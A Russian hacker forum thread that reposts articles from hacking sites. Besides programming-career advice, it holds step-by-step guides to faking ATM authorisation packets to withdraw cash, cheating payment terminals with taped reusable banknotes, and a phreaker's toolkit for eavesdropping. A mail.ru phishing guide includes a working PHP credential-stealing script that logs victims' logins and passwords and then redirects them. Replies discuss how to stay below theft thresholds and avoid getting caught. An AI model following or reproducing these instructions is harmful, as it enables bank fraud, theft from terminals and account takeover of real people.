Из двух работ лучшей будет та, которая больше нравится тебе. Отсюда следует, что работу нужно искать в соответствии со своими предпочтениями, при этом не пытаясь навязывать эти предпочтения другим. Если на такой-то фирме используется преимущественно DELPHI, глупо пытаться втиснуться туда, зная один лишь Си или Ассемблер. Знания чего бы то ни было при трудоустройстве вообще вторичны. Первично умение себя подать. Матчасть здесь отдыхает, а body language очень рулит. Основная ошибка начинающих — перечисление в резюме огромного перечня языков, сред программирования, операционных систем и библиотек, с которыми они как бы умеют работать. А работодателю на фиг не нужен программист-универсал, по чуть-чуть нахватавшийся всего. Ему нужен как раз человек, знающий свою узкую предметную область, но знающий ее глубоко. К тому же не так важно, сколько программ ты написал, - важнее, сколько из них ты поддерживаешь в настоящий момент.

Почему большинство программистских проектов проваливаются?

В основном это происходит из-за чрезмерного оптимизма и незнания рыночной ситуации. Никогда не стоит исходить из положительных предпосылок. Следует сразу подготовить себя к тому, что проект не будет закончен в намеченный срок, достигнуть стабильной работы программы не удастся, пользователи не будут платить, продукт не будет востребован, и он не будет превосходить имеющиеся на рынке аналоги :). Сумеешь ли ты вести бизнес в таких условиях?! Да, сумеешь, если не станешь сразу замахиваться на большое, а начнешь с малого. Сумеешь, если засунешь идею создать массовый продукт глубоко под хвост и сконцентрируешься на удовлетворении нужд небольшой группы пользователей, игнорируемой компаниями-гигантами. Сумеешь, если вместо одного большого шага будешь делать сто маленьких шажков.

Рефракторинг — бузворд или серебряная пуля?

Существует мнение, что если код не поддерживает автоматическое тестирование, то это отстой, и что перманентный рефракторинг — залог успеха. На самом же деле, сложность тестирующих модулей зачастую в разы превосходит сложность тестируемого ими кода, к тому же тестирующие модули нужно тоже как-то тестировать, а это уже бесконечная рекурсия получается. Существует определенная граница сложности, ниже которой автоматическое тестирование кода экономически неоправданно. А системы, взаимодействующие с внешней средой, могут быть протестированы в автоматическом режиме, только если мы создадим программный эмулятор этой самой среды, который, в свою очередь, тоже будет нуждаться в тестировании. Как разорвать этот замкнутый круг? Разбивать код на множество мелких модулей, каждый из которых будет настолько прост, насколько это вообще возможно. Тестирование модулей при этом значительно упрощается, но резко возрастает количество связей между модулями и, как следствие, появляются ошибки в их взаимодействии. Более того, модульная структура сама по себе гораздо более сложная, чем монолитная. Так что выводы неутешительны. Серебряных пуль нет, качество программного обеспечения по-прежнему остается низким и радикальных прорывов в этой области не наблюдается. Это не значит, что рефракторинг бесполезен, это значит, что он должен применяться с умом.

Как защитить свой код от хакеров?

Хакеры ломают все, что трассируется (а что не трассируется, то дизассемблируется), и надеяться, что выбранная система остановит их, может только идеалист. Хакеры существуют — это факт. И развивать свой бизнес, игнорируя кряки, все равно что вести строительство в Сибири из расчета, что лето никогда не закончится и температура всегда будет держаться выше нуля. Если твоя программа — продукт, ты — «покойник». Если же твоя программа — услуга, хакеры идут лесом, поскольку «взломать» услугу нельзя. Следовательно, нужно развивать онлайновые службы, организовывать обучающие семинары, ориентироваться на комплексные решения (где сама программа — всего лишь часть большой бизнес-машины, то есть сама по себе лишена смысла). Допустим, ты написал такую простейшую штуку как каталогизатор аудио-дисков. А теперь прикрути к нему онлайновую службу, позволяющую пользователям обмениваться своими базами данных (если один человек «вбил» описание дисков в базу, зачем тысячам других делать то же самое), затем начинай привлекать лейблы (или просто магазины, торгующие дисками), предоставив им возможность информировать пользователей о новинках и вести мониторинг реальной популярности своей продукции. В этом случае основным источником прибыли окажутся именно лейблы, а прибыль будет тем выше, чем больше у тебя пользователей. Для этого программа должна распространяться бесплатно. Но даже если она платная, то взломать ее все равно очень и очень сложно, поскольку основную ценность составит онлайновая база данных, доступ к которой контролировать легче.

0

11

ШурСтраКос - это не только веб-кулхацкер, но еще и кулфрицкер =). Вашему вниманию представляется статья на тему фрикинга.

Секреты взлома банкоматов

Автор статьи - ph1l1ster с xaker.ru

Intro.

Банковские автоматы и кредитные карточки уже давно появились на улицах больших городов и постепенно начинают входить в нашу жизнь. Что есть банкомат с точки зрения хакера? Правильно, источник халявы и быстрого способа заработать немного карманных деньжат. Ведь если украсть десяток-другой долларов, кто будет вас искать?

По словам банковских работников, оправданными с финансовой точки зрения будут поиски похитителя, умыкнувшего в свой карман по крайней мере 300 вечнозеленых.

Уменьшим эту цифру вдвое для безопасности и примем полученные полтораста баксов в качестве того потолка, заходить за который не стоит даже в том случае, если очень-очень хочется купить новый микропроцессор или материнскую плату, а к ним быстрый модем впридачу.

Впрочем, с юридической точки зрения похищение даже одного доллара - кража. Поэтому, прежде чем отправляться к ближайшему банкомату с кусачками и отверткой, запаситесь на всякий случай парой адвокатов и захватите Шварценеггера на тот случай, чтобы немножко попридержать службу безопасности банка, пока вы будете сматывать удочки. Для того чтобы получить деньги, мало найти потерянную карточку и вставить ее в прорезь автомата. Нужно ввести с клавиатуры определенный код, на карточке не написанный и хранящийся у клиента в голове

Сама по себе карточка без него бесполезный кусок пластика. К тому же ее бывший владелец, как только обнаружит пропажу, немедленно позвонит в банк, и у карточки будет выставлен знак изъятия. Другими словами, она исчезнет в недрах банкомата и уже больше никогда не попадет к вам в руки. Следовательно, нужно не только найти карточку, но еще и подсмотреть вводимый ее владельцем пароль и снять со счета требуемую сумму еще до того, как тот обнаружит пропажу.

Впрочем, если мы уж сумели подсмотреть пароль, то и карточку воровать совершенно необязательно. Достаточно ее считать. Что и сделали в свое время ребята из Эстонии. История шумная и известная почти каждому кардеру. В дорогих ресторанах официант, пока нес карточку клиента, успевал ее считать портативным устройством размером с пачку от сигарет, изготовленным из обычной магнитофонной головки, батарейки, усилителя сигналов и записывающего устройства. Ошибка горячих эстонских парней заключалась в том, что они грабили часто и помногу. Другими словами, в жадности.

А вот в другой истории злоумышленникам повезло больше. Как-то раз на малолюдной улице одного небольшого городка появился новый банкомат. Естественно, нашлись такие, что пожелали им воспользоваться. Опускают в него карточку, вводят нужный пароль. Ждут себе ждут, а банкомат им отвечает: извините, мол, нету денег или связи - в общем, выдает неподозрительное объяснение невозможности выдачи денег. В банке долго понять не могли - как совершается кража? Почему-то никому и в голову не могла придти мысль, что этот банкомат-то липовый и установлен злоумышленниками специально для чтения карт и запоминания паролей. Позже его демонтировали, но злоумышленников, кажется, так и не нашли. За полтора года (а именно столько он умудрился простоять) кардеры перекачали на свой счет немалую сумму. Однако же рядовой хакер скорее найдет оброненную кем-то впопыхах тысячедолларовую купюр, чем завалявшийся на свалке банкомат. Может быть, есть способ попроще?

Есть, но для этого потребуется умение держать паяльник в руках, чтобы смастерить себе некий хардваринговый девайс, а также разбираться в сетевых протоколах на канальном уровне. Идея проста до безобразия: поскольку банкомат в себе не хранит никакой информации и всегда обращается за ответом в банк, то можно, врезавшись в кабель между ним и банком, перехватить трафик и фальсифицировать его нужным нам образом. Ни один банк не в состоянии гарантировать целостность кабеля на всем его протяжении.

Разумеется, для анализа протокола обмена понадобится персональный компьютер, а также программа для снятия дампа и представления его в удобочитаемом виде. Можно, к примеру, воспользоваться компактной и маленькой утилитой pio и навигатором управления bleak_l, заботливо написанным хакером КРМС для взлома НТВ, но вполне подходящим и для этого случая.

Единственное, что придется спаять самостоятельно, так это контроллер для подсоединения к банковскому кабелю. В Сети очень много различных схем и энтузиастов, предлагающих за относительно небольшие деньги приобрести уже готовые изделия. Так или иначе, но в дальнейшем будем считать, что такой девайс у нас есть.

Приступаем к делу!

Ну вот. Обзаводимся ноутом, сниффером, шварцнегером и адвокатом на всякий случай ;)

1. Врезаемся в линию между банкоматом и авторизационным центом (заметим, что врезаться придется в разрыв кабеля, так чтобы вы в дальнейшем могли не только перехватывать, но и блокировать любые проходящие пакеты). Разумеется, что если мы хотя бы на мгновение прервем целостность кабеля, дело закончится плачевно. Поэтому поищите в книжках электронные схемы мгновенной коммутации "на ходу". Аналогичным образом мошенники нейтрализуют сложные системы электронных сигнализаций. Не тех, что в магазинах, а на порядок совершеннее.
2. Наблюдаем за пересылкой пакетов, не предпринимая никаких действий. Только наблюдаем, чтобы понять логику. На самом деле это "только" представляет собой утомительный и кропотливый анализ протоколов и расшифровки всех полей заголовков пакетов с той целью, чтобы в дальнейшем иметь возможность генерации и отправки собственных пакетов, не опасаясь того, что они чем-то будут отличаться от реальных.
3. Теперь манипулируем легальной картой (это значит, что по крайней меру одну карту вы должны будете все же завести) с тем, чтобы понять логику обмена. В частности, найти и опознать передаваемые банкоматом запросы и возвращаемые ему ответы.
4. Сравним теперь это с просроченной картой, чтобы определить реакцию системы в такой ситуации, а также найти и идентифицировать коды ошибок (они нам потом понадобятся).
5. Наконец, тяпнем по маленькой для храбрости и, оставив Шварценеггера на шухере, начнем процесс. Засовываем нашу карту, на счету которой лежат оставшиеся после экспериментов с банкоматом несколько долларов.
6. Наблюдаем, как банкомат шлет запрос, включая номер нашего счета и все остальное. Мы никак не вмешиваемся в этот процесс.
7. Авторизационный центр должен вернуть ответ, в котором содержится много полезной информации. А среди нее - максимально возможная сумма для снятия. Вот тут мы перехватываем этот пакет и взамен него шлем другой Чем он отличается от оригинального, не стоит, наверное, даже говорить - и так всем ясно. Но будьте внимательны! Эта сумма может присутствовать сразу в нескольких полях, кроме того, необходимо скорректировать и поле контрольной суммы, иначе ничего не получится! Это самый сложный момент во взломе.
8. Впрочем, на этом этапе вы еще ничем не рискуете. Если ошибетесь, то просто перехватите обратный ответ банкомата и не пропустите его. Ведь вы еще помните коды ошибок, не так ли? А поэтому пробуйте, пока банкомат не "проглотит" фальсифицированный пакет.
9. Ну что же, теперь требуйте от банкомата столько денег, на сколько у вас хватит совести. В это время банкомат передает банку, сколько денег было снято. Взаправду. Эту информацию надо перехватить и послать ложный пакет, что денег снято всего 1 доллар (или сколько у вас там осталось взаправду на карточке). Будьте очень внимательны. Теперь фальсифицированный пакет передается уже банку, и любое неверное действие будет необратимо зафиксировано системой безопасности, и даже Шварценеггеру скоро покажется жарковато.
10. Ну вот и все. Осталась маленькая проблема - как обеспечить сходимость дебета и кредита. Ведь банкомат ведет логи и протоколы всех действий. Подумайте, как можно обмануть систему.
11. Наконец все! Вы отсоединяете свой ноутбук от кабеля, по возможности замаскировав нелегальное подключение, и отправляетесь в ближайший компьютерный салон за новым микропроцессором.
12. Однако помните, что многие банкоматы сейчас снабжены контрольными телекамерами, что не есть хорошо. Но к счастью, еще не все И стальная крыса всегда найдет для себя щель!

Послесловие

А вообще, чтобы ломать банкоматы, неплохо бы разобраться в их устройстве, типовом протоколе обмена и программном обеспечении То есть так или иначе выбрать себе работу, связанную с их разработкой, созданием или по крайней мере эксплуатацией В этом случае вы получите действительно достоверную информацию об их устройстве, а также слабых и сильных сторонах А ведь уязвимость у них действительно есть Только она неочевидна для постороннего, не работавшего с ними человека. Но как и любому человеческому творению, этому свойственны недостатки не в меньшем числе.

0

12

Kestrel написал(а):

Впрочем, с юридической точки зрения похищение даже одного доллара - кража.

Глупости. Кража, как и любое чисто "имущественное" преступление начинается с 500 рублей.

0

13

Ну, статья не моя, а тебе на слово я поверю). Слушай, а если я сниму с чужой кредитки 499 рублей - тогда будет считаться, что преступления не было?)

0

14

Да. Отсутствие состава преступления в связи с незначительностью деяния.
Но тут, чтобы не вводить тебя в заблуждение, следует заметить, что терпила приврать может. Если лох крикнет, что ты у него 600 рублей сняла, а не 499 - ты сможешь обратное доказать?

0

15

А разве нигде не фиксируется, сколько денег было на счету и сколько было снято? О_о

0

16

Kestrel написал(а):

А разве нигде не фиксируется, сколько денег было на счету и сколько было снято? О_о

А я ХЗ эту механику. Тут речь о том, фиксируется ли то, кто именно и когда снимал деньги. Наверное, фиксируется, я так понимаю.

0

17

FAQ по многоразовой купюре (универсалке)

Автор статьи - DeaDevil с ][aker.ru

q) зачем мне многоразовая купюра (универсалка)?
a) для того чтоб использовать аппарат в целях пополнения баланса мобильного телефона, не тратя финансы

q) а как она выглядит ?
а) это обычная купюра высокого достоинства (100-5000 рублей) с наклееными по краям линиями скотча (они же шлейфы)

q) а какая длина у шлейфа?
а) 30 см - не прогадаешь.

q) скотч липнет к аппарату, что делать ?
а) не забывай , что за пределами купюры - скотч липнет сам к себе, так как он свёрнут вдвое !!!.

q) какие аппараты подходят для данного действия ?
а) а так сразу и не узнаешь - надо тестить.

q) как провести тест ?
а) необходимо использовать тестовую купюру, она выглядит как обычная купюра достоинством в 10 рублей с диагонально наклееным куском скотча с одной стороны купюры, хотя также возможно проводить тест с купюрой , на которой скотч с 2-х сторон.

q) а почему тестовая купюра должна выглядеть именно так?
а) да потомучто создатели аппаратов для пополнения счёта тоже не глупцы, в них давно присутствуют отражатели, тесты на края купюры, и многие другие подводные камни.

q) что если тестовая купюра не принялась ?
а) это говорит о том что в аппарате есть отражатель, попробуй использовать матовый скотч на универсалке, можешь налепить его на обычный сверху, так больше шансов вытащить купюру.

q) у меня принялась тестовая купюра, а универсалка выплёвывается, что это значит?
а) это значит , что в данной машинке стоит тест на края купюры, необходимо либо сделать надрезы у края, либо похитрить как на картинке...

q) а как не спалиться ?
а) есть техника безопасности, так как тебе на тест и пополнение счёта необходимо примерно 10-15 минут (а первый раз ещё боьше) - необходимо найти аппарат который собирает редко очередь более 2х человек и прийти к нему ночером , часика в 3-4...

q) а что если аппарат не принимает купюру даже с матовым скотчем ???
а) я предложу тебе забить на этот аппарат и искать другой, хотя меня бы он заинтересовал, я бы им плотно занялся и фрикнул. хотя сознаюсь ... фрикается не всё, не могу понять что там тест.(подозрения есть проведу тест - напишу)

q) а можно использовать нитки или леску ?
а) если ты гуру, можешь юзать хоть пылесос, я всего раз использовал леску, как результат - изорваный фиолет (500р, благо в банке приняли и поменяли)

q) если меня поймают я сяду ?
а) есть все шансы, мошенничество... как таковой статьи по фрикерству нету, но есть много статей куда попадает данное действие.

q) каждый день же идёт пересчёт купюр, спалят что моей не хватает и по номеру узнают что и где !!!
а) глупо, там лежит примерно 5к, половина из них 10рублёвки, и вдруг не хватает 500 рублей ... ну как возможно понять, что это именно ты ? подозреваемых сотни, а ещё возможен баг машины (лично видел как машина выплюнула купюру после того как тип оплатил и ушёл) . клади раз в месяц (2 месяца), и заведи несколько автоматов.

q) я вставил купюру без теста, а её зажевало и не отдаёт, чё делать в таком случае ?
а) надеюсь тебя твоё "без теста" чему-нибудь научит... ну чё, дёргай со всей силы шины на себя и иди оттуда (есть 3 варианта 1-купюра выдернется целой 2-рваная купюра 3-вырвется тока шина : 1-в карман 2-в банк на обмен 3-мвахахахаха)

q) а можно ли создать такую купюру, что будет подходить ко всем аппаратам ?
а) да можно, но это что-то ювелирное, я думаю что моя купюра почти стала таковой.

q) а можно оплачивать что-нибудь ещё, кроме телефона ?
а) хм... это вопрос достойный напряга мысли... думаю да, надо посмотреть. тестите, если прокатит - флаг в руки...

q) чем отличается тест-купюра со скотчем с одной стороны и с 2-х сторон ?
а) тем что можно найти положение отражателя относительно купюры одинарой клейкой и вообще обнаружить его наличие двойной.

0

18

Чемоданчик фрикера

Автор статьи - f02 с ][akeр.ru

Все свое ношу с собой

Стать крутым фрикером - мечта многих ребят. Мне часто приходят письма с вопросами, как стать фрикером, мол, научи и т.п. Вот я и решил сделать серию статей по этой тематике. Начну с чемоданчика фрикера. Это тот необходимый каждому телефонному пирату набор, который он должен всегда носить с собой. Даже когда идет на свидание с девушкой.

Необходимый набор

Определим, что же фрикеру ХХI века необходимо носить с собой. Нижеследующий перечень не претендует на классический образец для подражания, однако мне кажется, что он будет весьма полезен начинающим. Итак, вот он.
Трубка монтажника
Мобильный телефон
Универсальный нож (пассатижи, отвертки и т.п.)
Провода, «крокодилы»
Мультиметр
Газовый паяльник
КПК с RS-232 (например, Palm m100)
Модем
Ноутбук
Набор флюсов и припоев
Изолента
Разные боксы и всякая полезная мелочь
Прямые руки
Acoustic coupler
Набор фрикерских отверток
Контроллер/программатор
Разводной ключ
Рассмотрим некоторые пункты этого списка более подробно. В зависимости от степени нужности рядовому фрикеру того или иного устройства я ставил ему оценку в баллах, от одного до десяти.

Трубка монтажника

Оценка: 8 баллов

Цена: $70 или самодел

Этот девайс просто необходим фрикеру, звонящему за чужой счет и любящему послушать разговоры соседей. В купе со встроенным антиАОНом и Rock BOX может стать грозным орудием подстав. Если делать его лень, то вполне можно купить в специализированных магазинах.
Плюсы девайса: можно юзать везде, где есть телефонная линия; весьма мобилен; имеет ряд полезных функций; подвластен расширению в умелых руках.
Минусы: трубка занимает много места - если с ней возьмут, то не сможешь прикинуться домкратом и сказать, что проходил мимо.

Универсальный нож (ЛП)

Оценка: 10 баллов

Цена: $5-15

Эта вещь должна быть с тобой везде и всегда, даже если ты не фрикер. Быстро разобрать любой девайс, согнуть толстый провод, перекусить провода, что-то подточить, обжать, колбаску порезать, пырнуть кого-нибудь - да мало ли еще у него применений. Скажу одно, с этим ножиком я не расстаюсь никогда и ни капли не жалею о его приобретении.
Плюсы: может иметь встроенный набор разнообразных отверток, иногда поставляется в виде молотка, пассатиж и даже гаечного ключа.
Минусы: сходит за холодное оружие и может вызвать проблемы (хотя я проблем с ним не имел).

Мультиметр

Оценка: 6 баллов

Цена: $5-30

Универсальный измерительный прибор должен находиться в портфеле каждого настоящего гуру. С ним легко потестить любое устройство, разобраться, где неполадка в девайсе. В купе с газовым паяльником, небольшим набором деталей или процессорной платой может стать просто полноценным выносным фрикерским комплексом.
Плюсы: с помощью него можно измерять громадное количество параметров, в зависимости от модели; позволяет прозванивать провода, определять обрывы и различные неполадки.
Минусы: во многих ситуациях абсолютно бесполезный, занимающий место ящик.

Газовый паяльник

Оценка: 10 баллов

Цена: $15-50

Паяльник - неизменный спутник фрикера. Но любому паяльнику, даже самому современному, нужна розетка. А если ты на полевых работах и питание достать ой как сложно, то тебя всегда выручит газовый паяльник. С ним ты можешь даже в дороге собрать любой прибор или, наконец, починить свои наушники.
Плюсы: полная независимость от электроэнергии; можно использовать для резки пластмассы, для усаживания термоусадки и прочих вещей, где нужна высокая температура.
Минусы: весьма громоздкий, требует постоянной дозаправки газом; можно обжечься.
КПК

Оценка: 7 баллов

Цена: $30-700

Если ты крутой гуру программирования, умеешь кодить под КПК и владеешь интерфейсами этого девайса, то эта штука - для тебя. В купе с прямыми руками и хорошими мозгами с этим устройством ты сможешь свернуть горы покруче, чем в самых лучших фильмах про хакеров. К нему можно цеплять модемы или мобильные телефоны и хакать прямо из метро.
Плюсы: можно найти КПК с х86-архитектурой (как на фото), с нормальным интерфейсом RS-232 и цеплять к нему любые устройства, понимающие этот интерфейс.
Минусы: в руках новичка будет бесполезной игрушкой, которая может еще и повредить делу.

Acoustic coupler

Оценка: 3 балла

Цена: Сделать самому или найти у старьевщиков

Акустический соединитель был основным инструментом хакеров 80-90-х в США. В наши дни вымирающий девайс. Может быть полезен при взломе с таксофонов (зачем, есть же GPRS), либо для анонимной отправки факса.
Плюсы: ретродевайс, может служить атрибутом моды у фрикеров; позволяет вести соединения практически с любых телефонов; вместе с радиотелефоном образует радиомодем.
Минусы: необходимо специально хитро настраивать модем; очень низкая скорость соединения (скорее всего не удастся выжать больше 14400); занимает много места; требует дополнительного питания; морально устарел.

«Повелитель телевизоров»

Оценка: 5 баллов

Цена: $15

Ты любишь смотреть телик? Я терпеть не могу - когда вижу работающий ящик, судорожно ищу пульт, чтобы вырубить это слив. Теперь у тебя есть отличная возможность, не ища пульт, а достав брелок от ключей, вырубить любой телик. Торгуют этим супердевайсом тут: wwwtvsetoff.com. С этим устройством ты сможешь некисло веселить друзей, прогуливаясь по торговым центрам и нажатием всего одной кнопки гася сотни теликов.
Плюсы: миниатюрность, легкость использования; подходит практически для всех типов телевизоров; являясь универсальным выключателем, может очень повеселить.
Минусы: не очень хорошая сборка, при наличии прямых рук и небольшого количества времени можно сделать самому.

Процессорная плата

Оценка: 7 баллов

Цена: $15-300

Настоящий фрикер делает многие эмуляторы на микроконтроллерах, разводя при этом плату и паяя множество устройств. Что мешает ему прикупить такую процессорную плату под фаворитный ему контроллер и делать эмуляторы в дороге с ноутбука и КПК. Можно построить свой универсальный фрик-девайс, имеющий тысячи функций. А можно использовать как логический анализатор, в купе с КПК или лэптопом. В общем, бесценная штучка за копеечные деньги.
Плюсы: число возможных функций платы зависит только от твоей фантазии и кошелька. С ней можно делать громадное количество различных взломов, снятия логов, похищать пароли, вводимые с клавиатуры, делать ключи-карты – короче, всего не перечислишь.
Минусы: будет полезна только в опытных руках, при неплохом знании электроники и программирования. В руках новичка – бесполезный кусок пластика.

Разводной ключ

Оценка: 1 балл

Цена: $15-300

Это, наверное, самый нефрикерский девайс в нашем обзоре. Но он будет полезен при попытке открутить какое-нибудь устройство, например таксофон, для дальнейшего исследования. А можно и двинуть гопам по мордасам, если докопаются до крутого фрикера при занятии любимым делом.
Плюсы: выглядит стильно и внушительно. Идя по темным улицам, испытываешь уверенность, помня, что он с собой. Имеет множество полезных и бесполезных функций. Может стать очень «весомым аргументом» в неудавшемся разговоре.
Минусы: вполне сходит за холодное оружие, занимает много места и достаточно тяжелый.
Набор миниатюрных отверток

Оценка: 9 баллов

Цена: $3-15

Если ты часто раскручиваешь утонувшие мобилы, лэптопы, фотоаппараты и прочие мелкие электронные девайсы, и притом везде и всюду, то этот набор просто обязан стать твоим постоянным спутником. Коллега оставит свой ноут без присмотра, и ты в тот же миг сделаешь ему электронное западло .
Плюсы: позволяет вскрыть множество хитрых электронных устройств.
Минусы: подходит только для мелких винтиков, но это полностью компенсируется наличием фрикерского ножа.

Итог

Я перечислил лишь небольшую часть из того, что может понадобиться истинному телефонному пирату. Каждый составит свой список, под конкретные цели и задачи. Главное - помнить, что чем сложнее сеть становится, тем больше уязвимостей у нее появляется. Надо только уметь их находить. Удачи, фрикер!

Изготовление акустического соединителя

Простейший акустический соединитель может сделать каждый из нас. Для его изготовления потребуется трубка от старого совкового телефона, где есть угольный микрофон и динамик. Разбираем трубку. Там будут хитро соединены микрофон и динамик, нужно их соединить последовательно с девятивольтовой батарейкой и шнурком с разъемом, который будет вставлен в модем (смотри схему). То есть так: разъем –> микрофон –> динамик –> батарейка –> разъем. Полярность батарейки роли не играет.

0

19

Как стать программистом

Автор статьи - nerezus с forum.antichat.ru

Введение.
Эта статья не про выбор первого языка(несмотря на самый большой пункт тут).

1) А надо ли мне это?

действительно, советую хорошо подумать
Кто-то из KISS говорил примерно такое по смыслу "Если кто-то говорит, что он взял гитару и играет ради музыки, а не для того, чтобы заваливать телок, то это гон, можете плюнуть ему в лицо!" Тут заменяем телок на стабильные(хоть и небольшие) деньги, а музыку на кодинг =)

2) Для чего?

Собственно вопрос с подвохом. Ибо правильно ответят лишь немногие(и это будет совпадением).
А дело в том, что человек сам не знает, чего хочет. Да и как правило одним языком не заканчивается.

3) Определение первого языка для обучения. Эта часть займет около пары часов.
Есть 2 варианта: взять актуальный язык, либо язык типа паскаля или бейсика: которые не применяются.
Кто-то может возразить: мол Delphi или VB.NET. Разочарую их: Delphi и паскаль не имеют ничего общего кроме небольшого сходства в синтаксисе. Для VB.NET и BASIC оно и того меньше. И подходы в программировании абсолютно разные. Это все равно, что изучать C++, начав с книги по C. Но об этом поподробнее потом.
Однако хочу дать заранее совет: не стоит начинать с низкоуровневых вещей, т.к. при обучении программированию придется уделять не только алгоритму, но еще и работе с указателями, выделением памяти и прочими "вкусностями". Именно этим "страдают" C/C++/asm. Поэтому я бы не рекомендовал начинать с них - наверстать можно будет и потом(ну если конечно это будет нужно).
Итак, что у нас остается: Java, .NET(C#, VB.NET и подобные языки, распространено в основном в США), Delphi(только в бывшем СНГ, на общемировой арене это очень редкий зверь). и скриптовые языки: Python, Ruby, Perl. Так же существует PHP, однако для его изучения надо уже иметь теоретические(и желательно практические) знания о работе веба, многие этому не следовали, а что из этого получалось, можно узнать на phpclub.ru, посмотрев на тупейшие вопросы в основном разделе их форума).
Сам бы я посоветовал Python или бейсик. Кстати их объединяет одинаковая типизация: dynamic, strong. Кстати хочу заметить, что именно strong типизация позволит минимизировать количество логических ошибок.
Языки со strong-типизацией: Java, C++(именно C++, а не C), .NET языки, Python, basic, ruby, delphi. У C, Perl, PHP типизация weak(слабая).
Подробнее читать про конкретный язык в википедии(wikipedia.org).

4) Итак язык выбрали, с чего начинать?
С самого начала. По мере изучения языковых конструкций пробуем применять их на практике. это не сложный этап, однако именно на нем отсеивается большинство. И проблема с нехваткой материала для тренировок. Пример задачки(задача 1) можно увидеть в приложениях.

5) Допустим, выучили мы синтаксис.

Ну или почти выучили. Ведь некоторые языки типа бейсика, C, Pascal или Java можно выучить(имеется ввиду только синтаксис, причем без magic-фишек) очень быстро. Но вот научиться применять его - намного сложнее.
Эта часть похожа на изучение поведения сферического коня в вакууме. Потому что на примерах ее изучить практически нельзя. Отложим этот этап.
Итак, добро пожаловать в реальный мир!

6) Чем отличается реальная задача от задачи из задачника?
Правильно, тем, что она реальная. Для примера возьмем такую: написание программы для сортировки мейлов в файле. С графическим интерфейсом.
Что понадобиться знать? Работу с файлами, работу с GUI. Изучаем. Пишем. И перед нами уже начинает возникать проблема. Подробнее о ней немного дальше.
И именно на этом этапе начинаем изучать стандартные библиотеки языка/технологии. и не только стандартные.
Кстати, на этом этапе уже можно начинать зарабатывать. Однако качество продуктов будет хреновое
Решаем задачу 2(в приложениях).

7) Насчет проблем из пункта 5. Если работу с файлами можно сделать по принципам структурного подхода, то уже работа с GUI в этом стиле будет сплошным мучением. Итак, изучаем ООП. Именно практическую часть, т.к. в пункте 4 теория уже была выучена. Этап занимает достаточно много времени.
Именно по этой причине я не советовал начинать C++ с C, а Delphi с паскаля: переучиваться будет сложнее, чем начинать заново.
То есть учим теорию: ООП(нужно много практики), которая плавно перейдет в ООД, естественно надо будет знать паттерны, UML, принципы разработки и т.д.
Так же больше работаем на практике: регулярные выражения, работа с БД и SQL, GUI, сокеты, высокоуровневые протоколы, такие как HTML, FTP и всякие xmlrpc и SOAP, набор технологий XML и прочие.
Решаем задачу 3(на выбор).

8) Что дальше?
Совершенствуем свои навыки. Ты уже будешь сам знать, что тебе дальше делать.
P.S. Хочу заметить, что литературы на русском языке для тебя станет не хватать. Вообще. Так что знание английского обязательно. Именно обязательно, а не желательно.

И пару нюансов:

1) Практически для всех языком имеются свободные рабочие места. Ну кроме раритетных или специфических.
2) И вообще, если заказчику нужен готовый продукт, то ему, как правило, монопенисуально, на чем написан продукт.
3) У каждого языка своя направленность. Поэтому тупо применять к примеру PHP для написание клиентских приложений с GUI, а на ассемблере писать сайты или СУБД.
4) Заработок не зависит от языка/технологии, а только от уровня профессионализма.
5) А если занимаешься низкоуровневым программированием, то про ООП - не на твой счет.
6) Есть такое заблуждение: "Программист - это тот, кто умеет составлять алгоритмы". Так вот: умение составлять алгоритмы - требование обязательное, но не достаточное, на этом дальше 5 пункта(в этом обзоре) не уедешь.

Приложения:
Задача 1 (уровень: продвинутый школьник)
Старая задачка, обычно на школьных олимпиадах ее дают:
Имеется матрица (n*m) заполненная 1 и 0. Единицы - это острова, а нули - море. Если единицы находятся рядом по горизонтали или вертикали - то они образуют один остров. Найти количество островов.
P.S. Естественно могут быть "гнутые" и "дырявые" острова.
P.P.S. Как не странно, но решают ее редко, хотя она достаточно легкая.
Задача 2 Написать аналог wget.
Задача 3A Написать BB-парсер. Естесвенно не тупой подстановкой регекспов.
Задача 3Б Интерпретатор/HTTP-сервер/etc на выбор.

0

20

Взлом почты на mail.ru [СИ]

[::.INTRO.::]

Автор статьи - Chaak с forum.antichat.ru

Привет! В этой статье я буду повествовать о том, как взломать почтовый ящик на бесплатном почтовом сервисе mail.ru.
Статья предназначена для новичков, в СИ, а также для любого пользователя интернета, имеющего желание получить доступ к чужому аккаунту.
Но ладно не буду об этом долго писать и так понятно "зачем нужнен почтовый ящик взломщику ", сами поймете.
Статья сгодится для новичков. Гуру просьба не читать.

[::.PREPARATION.::]

Для начала нам понадобится бесплатный (лучше платный) хостинг с поддержкой PHP.
Можно зарегистрироваться на любом из этих:
*только заранее убедитесь что хостинг поддерживает PHP

Код:
km.ru 
nextmail.ru 
hobby.ru 
webrise.ru 
lapin.ru 
free.dl-hosting.ru 
hostow.net 
beplaced.ru 
777host.ru 
paltus.ru 
miraclehost.ru 
freebox.ru 
alfaspace.net 
k70.ru 
hosting.promostudio.ru 
chat.ru 
maxhost.ru 
nixup.com 
e2e.ru 
noka.ru 
newmail.ru 
boom.ru 
h15.ru 
hut.ru 
jino-net.ru 
pochta.ru 
unlimhost.ru 
onepage.ru 
by.ru 
sbn.bz 
yard.ru 
domainhosting.ru 
orthodoxy.ru 
webservis.ru 
ru-web.net 
activehost.ru 
househost.ru 
bestof.ru 
addr.ru 
hosting.dump.ru 
pesni.ru 
medbox.ru 
fatal.ru 
x5x.ru 
hopshot.com 
5gigs.com 
wagoo.com 
orgfree.com 
awardspace.com 
bobos.ca 
www.host.sk 
zportal.info 
spaceall.de 
3x.ro 
sretenie.ru 
dotgeek.org 
sevhosting.net 
o2g.net
www.jino-net.ru
www.nixup.com
newmail.ru
ho.com.ua/
wallSt.ru
hut.ru
holm.ru
e2e.ru
fatal.ru
host.sk
ut.ru
H1.ru
Hostmos.ru
Webm.ru
Rdcom.ru
narod.ru
front.ru
nm.ru 
chat.ru 
boom.ru 
by.ru

Зарегистрировали? - идем дальше!
Что нам нужно:
Во-первых нам нужен сниффер(это скрипт, позволяющий сохранять принимаемые данные в текстовый файл):

Код:
<?php
$f=fopen("mail.txt","at"); # файл куда сохранять
flock($f,2);
fputs($f,$_GET['Login']."@"); #логин
fputs($f,$_GET['Domain']); #домен
fputs($f,";".$_GET['Password']."\n"); # пароль
flock($f,3);
fclose($f);
?>
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

Рассмотрим скрипт поподробнее:

Код:
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

Это строка определяет, то место, куда мы будем перенаправлять пользователя после авторизации на письме-фейке.

